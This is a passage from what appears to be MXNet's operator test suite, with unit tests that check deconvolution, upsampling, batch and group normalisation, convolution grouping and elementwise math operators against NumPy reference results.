data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test._bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test._bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv._bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv._bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv._bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv._bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv._bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@pytest.mark.serial
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y._simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up._bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up._bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = shape[1],
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@xfail_when_nonstandard_decimal_separator
@pytest.mark.parametrize('op_name', ['BatchNorm', 'SyncBatchNorm'])
@pytest.mark.parametrize('shape', [(4, 2), (4, 3, 4),
(4, 6, 4, 5), (4, 5, 6, 4, 5)])
@pytest.mark.parametrize('fix_gamma', [False, True])
@pytest.mark.parametrize('cudnn_off', [False, True])
@pytest.mark.parametrize('output_mean_var', [False, True])
def test_batchnorm(op_name, shape, fix_gamma, cudnn_off, output_mean_var):
if op_name == 'BatchNorm':
op = mx.nd.BatchNorm
elif op_name == 'SyncBatchNorm':
op = mx.nd.contrib.SyncBatchNorm
else:
raise ValueError(f'Not supported {op_name}')
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req):
kwargs = dict(output_mean_var=output_mean_var)
if op_name == 'SyncBatchNorm':
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
if not fix_gamma:
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad(grad_req=gamma_grad_req)
else:
bn_gamma = mx.nd.ones(shape=(nch,))
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad(grad_req=beta_grad_req)
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
adX, adW, adb = 0, 0, 0
is_train = data_grad_req != 'null' or \
(not fix_gamma and gamma_grad_req != 'null') or \
beta_grad_req != 'null'
for _ in range(num_iters):
if data_grad_req != 'add':
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=fix_gamma, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
if is_train:
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
m = np.prod(shape) / shape[axis]
# cudnn uses m-1 in the denominator of its sample variance calculation, not m
sample_var_adjust = 1.0 if cudnn_off or fix_gamma else m / (m-1)
running_var = running_var * momentum + \
data_var_flat * sample_var_adjust * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
adX = dX if data_grad_req != 'add' else adX + dX
adW = dW if gamma_grad_req != 'add' else adW + dW
adb = db if beta_grad_req != 'add' else adb + db
atol, rtol = 5e-2, 5e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
if is_train:
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
if data_grad_req != 'null':
assert_almost_equal(data.grad.asnumpy(),
adX.asnumpy(), atol=atol, rtol=rtol)
if not fix_gamma:
if gamma_grad_req != 'null':
assert_almost_equal(
bn_gamma.grad.asnumpy(), adW.asnumpy(),
atol=atol, rtol=rtol)
else:
assert((bn_gamma.asnumpy() == 1).all())
if beta_grad_req != 'null':
assert_almost_equal(
bn_beta.grad.asnumpy(), adb.asnumpy(), atol=atol, rtol=rtol)
grad_reqs = ['write'] if len(shape) != 4 else ['null', 'write', 'add']
for data_grad_req in grad_reqs:
for gamma_grad_req in grad_reqs:
if fix_gamma and gamma_grad_req != 'null':
continue
for beta_grad_req in grad_reqs:
for axis in range(len(shape)):
_test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req)
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, dshape[1], 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat.reshape(dshape) * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out, mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, dshape[1], 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
gamma_grad = np.sum(x_hat * ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
x_hat_grad = ograd * gamma.reshape(1, num_groups, dshape[1] // num_groups, 1, 1)
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_channels,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd, dtype=np_ograd.dtype)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1._simple_bind(default_context(), x=shape)
exe2 = y2._simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@pytest.mark.skip(reason="Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
